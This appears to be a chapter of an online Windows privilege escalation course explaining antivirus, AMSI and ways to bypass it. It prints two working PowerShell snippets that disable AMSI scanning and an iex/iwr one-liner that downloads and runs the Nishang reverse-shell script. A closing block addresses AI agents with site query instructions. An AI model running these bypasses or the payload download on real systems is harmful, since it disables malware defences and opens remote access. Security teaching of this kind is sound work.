# 17 - AMSI Bypass

#### Topics <a href="#topics" id="topics"></a>

> 1. Introduction to the Windows Shells
> 2. Windows Permissions
> 3. Reverse Shells in Windows
> 4. SeImpersonatePrivilege Exploitation
> 5. On Cross Compilation
> 6. Windows Services
> 7. Weak Service Permissions
> 8. Unquoted Service Path
> 9. DLL Hijacking
> 10. Always Install Elevated
> 11. Files with Sensitive Data
> 12. Windows Hashes
> 13. Stored Credentials and the Windows Vault
> 14. Scheduled Task
> 15. Critical Registry Paths
> 16. Useful Tools
> 17. AMSI Bypass

## **What is an Antivirus?**

An antivirus is software designed to detect, prevent, and remove malicious software (*malware*). Its purpose is to protect systems from threats such as viruses, worms, trojans, spyware, and ransomware.

Modern antivirus software employs various detection techniques:

1. **Signature-Based Detection**\
   Matches files against a database of known malware signatures (e.g., MD5 hash).
2. **Static Analysis**\
   Examines file properties and code structure for suspicious patterns.
3. **Dynamic Analysis**\
   Observes program behavior in real-time or in isolated environments like sandboxes to identify malicious actions.
4. **Machine Learning Models**\
   Uses predictive algorithms to detect unknown threats based on behavioral patterns.

### **Related Technologies**

Antivirus software often works in tandem with other security solutions:

* **Firewalls**: Block unauthorized network traffic.
* **Endpoint Detection and Response (EDR)**: Provides advanced threat hunting and endpoint protection.
* **Intrusion Detection/Prevention Systems (IDPS)**: Monitor networks for malicious activity.
* **Web Application Firewalls (WAF)**: Protect web applications from common attacks like SQL injection and cross-site scripting (XSS).

***

## **Antivirus in Windows**

Windows includes several built-in security technologies to safeguard users:

1. **Windows Defender Antivirus**: Real-time protection against malware and viruses.
2. **Firewall & Network Protection**: Blocks unauthorized traffic.
3. **Secure Boot**: Prevents unauthorized software from running during startup.
4. **BitLocker**: Encrypts disks to protect sensitive data.
5. **Windows Hello**: Password-free authentication using biometrics.

### **Windows Antimalware Scan Interface (AMSI)**

Introduced in 2015, **AMSI** is a standard interface for integrating security tools with Windows applications. AMSI scans memory, files, and script content for malicious behavior before execution.

**Key Features of AMSI:**

* Supported by PowerShell, WMI, and Office macros.
* Integrates with antivirus solutions for dynamic scans.
* Useful for analyzing script-based attacks, such as those using PowerShell or JavaScript.

**Workflow:**

1. The application requests a scan.
2. AMSI sends the request to an antivirus provider.
3. The antivirus scans the data and provides results.

**Examples of AMSI Scanning:**

* PowerShell scripts
* Office macros (e.g., VBA)
* .NET assemblies

***

## **AMSI Bypass**

Despite AMSI's robust design, attackers have developed techniques to bypass its protections. These bypasses typically exploit PowerShell or manipulate AMSI-related memory structures.

### **Modifying `amsiContext`**

The `System.Management.Automation.AmsiUtils` class handles AMSI interactions in PowerShell. By modifying the `amsiContext` pointer to disable AMSI scans:

```powershell
$fields=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetFields('NonPublic,Static')
$amsiContext=$fields | Where-Object { $_ -like "*Context" }
[IntPtr]$amsiContextPointer=$amsiContext.GetValue($null)
[Int32[]]$emptyBuffer = @(0)
[System.Runtime.InteropServices.Marshal]::Copy($emptyBuffer, 0, $amsiContextPointer, 1)
```

***

### **Setting `amsiInitFailed`**

This bypass involves setting the `amsiInitFailed` flag to `true`:

```powershell
$amsiInitFailedField=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetFields('NonPublic,Static') | Where-Object { $_.Name -like "amsiInitFailed" }
$amsiInitFailedField.SetValue($null, $true)
```

***

**Demonstration of AMSI Blocking a Malicious Script**

Attempting to load a malicious script like **Invoke-PowerShellTcp.ps1** results in an AMSI warning:

```powershell
iex (iwr "https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1" -UseBasicParsing).Content
```

**Error:**

```bash
This script contains malicious content and has been blocked by your antivirus software.
```

With the bypass, AMSI is disabled, allowing the script to execute.

***

## Other Resources

* **AMSI Bypass Techniques Overview**:\
  [AMSI Bypass](https://www.youtube.com/watch?v=8y8saWvzeLw)
* **GitHub Repository with AMSI Bypass Examples**:\
  [S3cur3Th1sSh1t - AMSI Bypass](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell)
* **Microsoft AMSI Documentation**:\
  [AMSI Developer Guide](https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-start-page)

{% hint style="danger" %}
**Disclaimer**

**❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!**❗
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dev-angelist.gitbook.io/windows-privilege-escalation/17-amsi-bypass.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.